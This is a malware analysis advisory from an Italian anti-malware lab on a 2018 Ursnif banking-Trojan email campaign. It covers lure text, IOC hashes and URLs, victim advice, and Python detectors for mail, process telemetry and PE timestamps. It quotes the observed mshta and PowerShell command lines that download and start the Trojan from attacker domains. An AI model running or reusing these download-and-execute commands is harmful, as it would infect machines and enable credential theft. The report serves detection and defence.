14/03/2018 08:40

Malspam campaign distributing Ursnif malware continues on March 13, 14 2018


Italy is again under attack by the Ursnif banking Trojan, with the largest email volumes on March 13 and 14, 2018.
TG Soft's C.R.A.M. (Anti-Malware Research Center) examined an email campaign spreading the Ursnif banking Trojan, sent on March 13 and 14, 2018.

Cyber-criminals use social engineering in these fraudulent mass mailings to induce the victim to open the infected attachment or click a link in the body of the message.

If you have received a suspicious email, send it to C.R.A.M. (Anti-Malware Research Center); see "How to send suspicious emails for analysis" below.


"Ursnif" malware campaign.

Malware family: Ursnif
Vir.IT detection names: Trojan.Win32.Ursnif.EO, Trojan.DOC.Dropper.OP, Trojan.DOC.Dropper.OM, Trojan.Win32.Ursnif.EP


Description:
The email campaign started on March 13, 2018 and is continuing with a new wave today, March 14.

Subject: [varies; taken from the message being replied to]

Buongiorno,

Vedi allegato e di confermare.

(Good morning,

See attached and to confirm.)

How it spreads:
The campaign abuses the e-mail accounts configured on already-infected PCs, sending fake replies carrying the malicious attachment to messages ALREADY RECEIVED by the victim.
The body of the message is always the same (quoted above), while the subject differs from mail to mail because it is the subject of the message being replied to.
The malicious attachment is a DOC file containing an AutoClose macro. Word runs an AutoClose macro when the document is closed, so once the victim has enabled macros and closes the file, the macro downloads the malware and runs it.
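The reply-lure pattern described above lends itself to a mail-gateway rule. The following Python is an added example written for this page, not TG Soft's code: it parses a raw message, checks whether the plain-text body is the lure text quoted above, whether a Word/OLE attachment is present (by extension or by the OLE2 magic bytes, since an extension can be renamed), and whether the mail is a reply to an existing thread. The sample message is constructed: sender, recipient, subject and attachment name are invented, and the attachment is only an OLE2 header, not a real macro document.

```python
"""Mail-side check for the reply lure used in this campaign (added example)."""
import re
import email
from email import policy
from email.message import EmailMessage

LURE_BODY = "Buongiorno, Vedi allegato e di confermare."   # lure text quoted in the report
OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")              # header of legacy .doc (OLE2) files
WORD_EXTENSIONS = (".doc", ".docm", ".dot", ".dotm")


def _normalise(text):
    """Collapse whitespace so line breaks in the body do not defeat the comparison."""
    return re.sub(r"\s+", " ", text).strip()


def analyse_message(raw):
    """Classify a raw RFC 5322 message: returns ('quarantine' | 'review' | 'clean', findings)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    subject = str(msg.get("Subject", ""))
    # Italian Outlook prefixes replies with "R:"; English clients use "Re:".
    is_reply = bool(msg.get("In-Reply-To") or msg.get("References")) \
        or subject.lower().startswith(("re:", "r:"))
    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part is not None else ""
    lure = _normalise(body) == _normalise(LURE_BODY)
    if lure:
        findings.append("body is the known lure text")
    word_docs = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        payload = part.get_content()
        if isinstance(payload, str):
            payload = payload.encode("utf-8", "replace")
        # The extension can be renamed; the OLE2 magic identifies a legacy Word container regardless.
        if name.endswith(WORD_EXTENSIONS) or payload[:8] == OLE_MAGIC:
            word_docs.append(name or "<unnamed>")
    if word_docs:
        findings.append("Word/OLE attachment(s): " + ", ".join(word_docs))
    if is_reply and word_docs:
        findings.append("reply to an existing thread carrying a Word attachment")
    if lure and word_docs:
        return "quarantine", findings
    return ("review" if findings else "clean"), findings


def build_sample(lure=True):
    """Constructed message shaped like the campaign mail (not a real capture)."""
    m = EmailMessage()
    m["From"] = "Mario Rossi <m.rossi@example.invalid>"        # invented
    m["To"] = "Giulia Bianchi <g.bianchi@example.invalid>"     # invented
    m["Subject"] = "R: Ordine 1843"                            # invented reply subject
    m["In-Reply-To"] = "<orig-1843@example.invalid>"
    if lure:
        m.set_content("Buongiorno,\n\nVedi allegato e di confermare.\n")
        # A bare OLE2 header stands in for the macro document; no real macro is included.
        m.add_attachment(OLE_MAGIC + b"\0" * 24, maintype="application", subtype="msword",
                         filename="Ordine_1843.doc")
    else:
        m.set_content("Buongiorno,\n\nconfermo la ricezione dell'ordine, grazie.\n")
    return m.as_bytes()


if __name__ == "__main__":
    for flag in (True, False):
        print(analyse_message(build_sample(lure=flag)))
```

A body match alone is enough to quarantine only because this campaign's text is fixed; a reply that merely carries a Word attachment is flagged for review, not blocked, since that shape is common in legitimate mail.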
 
The AutoClose macro first runs MSHTA.EXE, passing it as a parameter the URL from which the PowerShell stager is obtained (2018-03-13 campaign):

C:\Windows\System32\mshta.exe http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidf

The content fetched by mshta.exe in turn launches PowerShell with the following command line (shown on one line, as logged):

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile('http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidf.class', $env:APPDATA + '\\dcd83bd5.exe'); Start-Process $env:APPDATA'\\dcd83bd5.exe'; (New-Object System.Net.WebClient).DownloadString('http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidf');

The PowerShell command downloads the Ursnif executable from http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidf.class, saves it in %APPDATA% under a random name (dcd83bd5.exe in this sample), starts it with Start-Process, and finally requests freddie.php?l=itpidf; the response to that last request is discarded, so it most likely serves to tell the operators that the download succeeded. Note the -Exec Bypass switch, which sidesteps the PowerShell execution policy: that policy is not a security boundary and should not be relied on as one.
Across the DOC files analysed, the infection chain contacts the following URLs (the itpidf suffix changes from sample to sample; see the IOC list below):
  • http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidf
  • http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidf.class
  • http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidf

Once started, the malware creates a value in HKCU\Software\Microsoft\Windows\CurrentVersion\Run of the form [random value] = %USERPROFILE%\APPDATA\ROAMING\MICROSOFT\[RANDOM FOLDER]\FILENAME.EXE so that it runs at every logon.
Ursnif then injects itself into the EXPLORER.EXE process.
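The chain above (Word spawns mshta.exe with a URL, mshta.exe spawns powershell.exe with -Exec Bypass and a WebClient download, the payload is started from %APPDATA% and persists through the HKCU Run key) is easy to express as a triage rule over process-creation telemetry. The following Python is an added example, not part of the original report: it classifies process-creation events (parent image, image, command line, as Sysmon event ID 1 would record them), checks Run-key values against the persistence path described above, and matches MD5s against the report's EXE IOCs. The sample events are constructed from the command lines quoted above; the Office install path, the notepad event and the user name are invented.

```python
"""Host-side triage for the Ursnif infection chain described above (added example)."""
import re
from urllib.parse import urlparse

# Indicators copied from the report's IOC lists (lower-cased for comparison).
KNOWN_DOMAINS = {"dqwowqjudhqwdhasdadadw.com", "waidjqwudhsfganweweha.com"}
KNOWN_EXE_MD5 = {
    "11eec45893c23484dd31797690fe2203", "39f75fd74a440beefea83b52f290aa3e",
    "58bf0383ac83dfbce1851fe02ffb4b55", "92001083584da4f9394371c9db2570d6",
    "e79e933b5241caa7763830c0ce4e241e", "a3d71e2e2249067cff6ecbbec5e7c7a1",
    "aa583374d7a08d90772a3dad3280886d", "b857cc9cd3a3e10724bcc659fcc020c1",
    "f5533a3f2dfa99d16e99f56c8c182c71", "fcf53476c655730bf3486983be218455",
}
OFFICE = {"winword.exe", "excel.exe"}
STAGERS = {"mshta.exe", "cmd.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)
# Persistence path from the report: %USERPROFILE%\AppData\Roaming\Microsoft\<random folder>\<name>.exe
RUN_VALUE_RE = re.compile(
    r"^(%userprofile%|[a-z]:\\users\\[^\\]+)\\appdata\\roaming\\microsoft\\[^\\]+\\[^\\]+\.exe$",
    re.IGNORECASE)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extract_urls(cmdline):
    """URLs in a command line; also accepts the defanged 'example[.]com' notation used in the report."""
    return URL_RE.findall(cmdline.replace("[.]", "."))


def classify_process(parent_image, image, cmdline):
    """Reasons a process-creation event (e.g. Sysmon event ID 1) matches the stager pattern."""
    reasons = []
    parent, img = _basename(parent_image), _basename(image)
    lowered = cmdline.lower()
    urls = extract_urls(cmdline)
    hosts = {urlparse(u).hostname.lower() for u in urls if urlparse(u).hostname}
    if img == "mshta.exe" and urls:
        reasons.append("mshta.exe launched with a remote URL")
    if img == "powershell.exe":
        if re.search(r"-(exec|executionpolicy|ep)\s+bypass", lowered):
            reasons.append("PowerShell execution policy bypass")
        if "downloadfile" in lowered or "downloadstring" in lowered:
            reasons.append("PowerShell WebClient download")
        if "start-process" in lowered and re.search(r"\$env:appdata.*\.exe", lowered):
            reasons.append("drops and starts an EXE under %APPDATA%")
        if parent in {"mshta.exe", "cmd.exe"}:          # March 13 (mshta) and March 14 (cmd) variants
            reasons.append(f"powershell.exe launched from {parent}")
    if parent in OFFICE and img in STAGERS:
        reasons.append(f"{img} spawned by Office application {parent}")
    for host in sorted(hosts & KNOWN_DOMAINS):
        reasons.append(f"contacts known distribution domain {host}")
    return reasons


def suspicious_run_value(value_data):
    """True if a HKCU\\...\\Run value points at an EXE in a subfolder of %APPDATA%\\Microsoft.
    Hunting heuristic, not an indicator on its own."""
    return bool(RUN_VALUE_RE.match(value_data.strip().strip('"')))


def known_bad_md5(md5_hex):
    return md5_hex.strip().lower() in KNOWN_EXE_MD5


# Constructed sample events (parent image, image, command line) built from the report's command lines.
SAMPLE_EVENTS = [
    (r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE", r"C:\Windows\System32\mshta.exe",
     r"C:\Windows\System32\mshta.exe http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidf"),
    (r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile("
     r"'http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidf.class', $env:APPDATA + '\\dcd83bd5.exe'); "
     r"Start-Process $env:APPDATA'\\dcd83bd5.exe'"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\Users\anna\note.txt"),
]


def triage(events):
    """Return only the events that matched, with their reasons."""
    hits = []
    for parent, image, cmdline in events:
        reasons = classify_process(parent, image, cmdline)
        if reasons:
            hits.append((_basename(image), reasons))
    return hits


if __name__ == "__main__":
    for image, reasons in triage(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
```

The Run-key check is a hunting heuristic rather than an indicator: some legitimate software keeps executables under %APPDATA%\Microsoft, so treat a hit as a candidate for review and pair it with the hash check or with the process lineage above.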

Examples:
Name: 53aeb123.exe
MD5: E79E933B5241CAA7763830C0CE4E241E
Size: 357,376 bytes
Compilation date: 31/05/2024 02:17:41

The compilation timestamp in the PE header has been forged: it points to 2024, more than six years after the sample was seen in the wild. A timestamp later than a sample's first sighting proves tampering on its own; an old timestamp does not, and needs other evidence.

Name: d2203965.exe
MD5: 11EEC45893C23484DD31797690FE2203
Size: 612,864 bytes
Compilation date: 04/10/2004 15:59:46
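The forged compilation date can be checked mechanically from the COFF file header, which stores the link time as a 32-bit Unix timestamp. The following Python is an added example, not the report's tooling: it reads IMAGE_FILE_HEADER.TimeDateStamp from a PE image and compares it with the date the sample was first seen. The sample buffers are constructed header-only images carrying the two compile dates quoted above (read as UTC); they are not the actual samples, whose hashes are in the IOC section.

```python
"""Check a PE sample's compile timestamp against when it was first seen (added example)."""
import struct
from datetime import datetime, timezone

PE_SIGNATURE = b"PE\0\0"


def utc(*args):
    """Aware UTC datetime from (year, month, day[, hour, minute, second])."""
    return datetime(*args, tzinfo=timezone.utc)


def pe_timestamp(data):
    """Return IMAGE_FILE_HEADER.TimeDateStamp as an aware UTC datetime; ValueError if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)          # offset of the PE header
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE or len(data) < e_lfanew + 24:
        raise ValueError("PE header not found or truncated")
    # IMAGE_FILE_HEADER: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    _machine, _nsections, stamp = struct.unpack_from("<HHI", data, e_lfanew + 4)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def timestamp_verdict(data, first_seen):
    """Compare the compile timestamp with the sample's first-seen date (an aware datetime).
    Only a timestamp after first sighting proves tampering; an old one may be real or forged
    and needs other evidence (export, debug and resource directory timestamps, signing dates)."""
    ts = pe_timestamp(data)
    if ts.timestamp() == 0:
        return ts, "zero (stamp stripped)"
    if ts > first_seen:
        return ts, f"forged: compiled {(ts - first_seen).days} days after first sighting"
    return ts, "plausible"


def build_header_only_pe(stamp):
    """Constructed minimal PE (DOS header + signature + file header) carrying `stamp`.
    Enough for the parser; it is not a runnable executable."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)     # e_lfanew: PE header directly after the DOS header
    file_header = struct.pack("<HHIIIHH", 0x014C, 3, int(stamp.timestamp()), 0, 0, 0xE0, 0x0102)
    return bytes(dos) + PE_SIGNATURE + file_header


if __name__ == "__main__":
    first_seen = utc(2018, 3, 13)                # campaign date from the report
    # Constructed samples using the two compile dates quoted in the report (read as UTC).
    for stamp in (utc(2024, 5, 31, 2, 17, 41), utc(2004, 10, 4, 15, 59, 46)):
        ts, verdict = timestamp_verdict(build_header_only_pe(stamp), first_seen)
        print(ts.isoformat(), verdict)
```

Note that the 2004 date on the second sample comes back as "plausible" only because the header alone cannot disprove it; treat compile timestamps as a clue to corroborate, not as a fact about when the binary was built.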

In the March 14 campaign, the Word macro first runs cmd.exe, which then launches powershell.exe to download the Ursnif banking Trojan from http://waidjqwudhsfganweweha[.]com (full URLs in the IOC list below).
 

Note:
The downloaded malware belongs to the Ursnif family, a banking Trojan whose main purpose is to steal credentials for high-value services such as home banking, email and FTP.

IOC 2018-03-13:

DOC file MD5:
082067D08B4922CE359B08314572E17E
0A301BF3A183B07A29BF94E124569534
177425E33D7CB92E878B6CEEE7B69A4D
196124165249B60C4DBFC2BF541D53FC
1D4CFFA8503DCE2938367BE8586E0021
209F8193DCAA71C59625DFDDE52C38F3
2449CA769FBC20627012F1AAFF20DCDD
307E56E1B135E13EB0C3036978BCDAEB
3093611810F68DAE319095C4CBD83670
3BBA84853F5684BDFBB16D81E73A4D0F
3E287BF157D8355DBFEB7DCD81809CFC
43AA5981EDBF0604407A190AED3B17C7
4C10C21AE77940D1E5D6983268750F18
5917D6A7E7FBB19F6EC92D3488007095
62EF5FFDC1CFDD371E1A1BF4A63CB7C4
630F3AE1AC0054D0A8B9AB23AE75A904
6B30646D9B94A9449BAF9DDF3C325BEF
6C6274741355D7455D17D11E69501F14
765DA376D714E3BF7FDCE76CD03536A6
7945A4E9AACE1DF637C773F4B55AAD8B
7C4EFAA52802C59E73F87549117F8EF0
929AD25BCD81D3C33E84F61F1BB86FE0
A931B9E57A84D80405A0D417741476D7
AB41A1A8704D975ABA8CB8B72A98805A
BDA1E9E53FC818D8C1BCE320B71E77C5
BECF044A04E5DD1EFDFD2595B44D3304
C1BE41600B7E3FF0F16613866E52F8ED
C347A48A75F935E93AB9A7E445ECEB36
CC5FC59049C4BA39F7D84F3C68FDD52C
D09EA2FCD19D07BD07EFDEB1896E7E03
D394EF1BCE9ABF795E099145D89B22B2
DC9FCB24B7A929D95F9BB39FF00D41DE
EB9F29B3C6099A244D144F767178A129
FA9EB2B192E5A9FF0F7F999E9986FFBA
FEC143157AEBE91F6160E559B3859034

EXE file MD5:
11EEC45893C23484DD31797690FE2203
39F75FD74A440BEEFEA83B52F290AA3E
58BF0383AC83DFBCE1851FE02FFB4B55
92001083584DA4F9394371C9DB2570D6
E79E933B5241CAA7763830C0CE4E241E


URL:
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpid
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpida
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidb
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidc
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidd
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpide
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidf
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpid.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpida.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidb.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidc.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidd.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpide.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidf.class
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpid
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpida
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidb
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidc
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidd
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpide
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidf



IOC 2018-03-14 (updated at 12:56):

DOC file MD5:
10B415DA3B0931502C96A517F96A618D
143E45E1C63349C1E2F8A109F30FEB9A
1DC3EAD8A99918008CE416BFB9FB87A6
2CD58B6EF36D218FB89151D28668998E
38A4237CE90D40B3BDB0E51457F82D2E
4462587452684966029886A14E3409C9
5B75CE27B8A5D489223FF3BF8F07616D
704970D3342CE1F89B00CD5279FC863B
99570DD0B28429FD76842FB55204CB23
A3B4536464CEA7DB732885B6BA011C17
BB4F9A8AB9DB369FB4819D7AA9F42F9B
D9EE1AB90C2FC022194AFB4B96831920
F3CFC46592170CF1D8AD466134FD53D5


EXE file MD5:
A3D71E2E2249067CFF6ECBBEC5E7C7A1
AA583374D7A08D90772A3DAD3280886D
B857CC9CD3A3E10724BCC659FCC020C1
F5533A3F2DFA99D16E99F56C8C182C71
FCF53476C655730BF3486983BE218455


URL:
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker1.class
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker2.class
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker3.class
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker4.class
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker5.class

 


 


How to identify a fake email

Experience and common sense are the first defences against this kind of scam.
Read the email carefully, in all its parts. Be wary of unexpected attachments, whether ZIP archives or Office documents, and, if at all possible, DO NOT enable automatic macro execution: with automatic execution enabled, simply opening a Word or Excel file runs its macros immediately, without any warning. In this campaign the attachment is a DOC file whose macro only runs once macros have been enabled, so leaving the default block in place stops the infection before it starts.
If you have been infected by a banking Trojan, C.R.A.M.'s advice is to take precautions even after the affected system(s) have been cleaned, such as changing the passwords you use most on the Web. If the workstation is used for home banking, also check your accounts with your bank.

How to send suspicious emails for analysis as possible virus/malware/ransomware and/or phishing attempts

Material can be sent to TG Soft's Anti-Malware Research Center for analysis, always free of charge, safely in two ways:
  1. Forward the suspect email directly from the recipient's mailbox to lite@virit.com, choosing "Forward as attachment" as the sending mode and putting "Possible phishing page to verify" or "Possible malware to verify" in the subject;
  2. Save the email to be analysed by TG Soft's C.R.A.M. as a file outside the email client and upload the resulting file from the page Send Suspicious Files (http://www.tgsoft.it/italy/file_sospetti.asp). If you want feedback on the analysis, indicate an email address and a brief description of the reason for the submission (for example: possible/probable phishing, possible/probable malware, or other).
These suggestions are meant to help you avoid credential theft, viruses/malware and, worse still, next-generation ransomware / crypto-malware.
 

Integrate your PC / SERVER protection with Vir.IT eXplorer Lite

If you are not yet using Vir.IT eXplorer PRO, we recommend installing Vir.IT eXplorer Lite (FREE Edition) alongside the antivirus already in use, to increase the security of your PCs and SERVERs alike.

Vir.IT eXplorer Lite has the following features:
  • freely usable in both private and corporate environments, with Engine+Signature updates without time limit;
  • interoperable with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security product already present on PCs and SERVERs. We recommend using it as a supplement to the antivirus already in use: it does not conflict with it or slow down the system, and it significantly improves identification and remediation of infected files;
  • it identifies and, in many cases, removes most of the viruses/malware currently circulating or, alternatively, lets you send them to the C.R.A.M. Anti-Malware Research Center for further analysis and to update Vir.IT eXplorer PRO;
  • through its Intrusion Detection technology, also available in the Lite version, it can report new-generation viruses/malware that have installed themselves to run automatically, and send the reported files to TG Soft's C.R.A.M.;
  • download Vir.IT eXplorer Lite from the official distribution page of TG Soft's website.

For Vir.IT eXplorer PRO users...

Vir.IT eXplorer PRO owners can also contact TG Soft's technical phone support free of charge. Details are on the CLIENTS support page.
 


C.R.A.M.
 
TG Soft's Anti-Malware Research Center

 




Any information published on our site may be used and published on other websites, blogs, forums, facebook and/or in any other form both in paper and electronic form as long as the source is always and in any case cited explicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web page from which textual content, ideas and / or images have been extrapolated.
It will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of summary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by TG Soft of which we point out the direct link to the original information: [direct clickable link]”
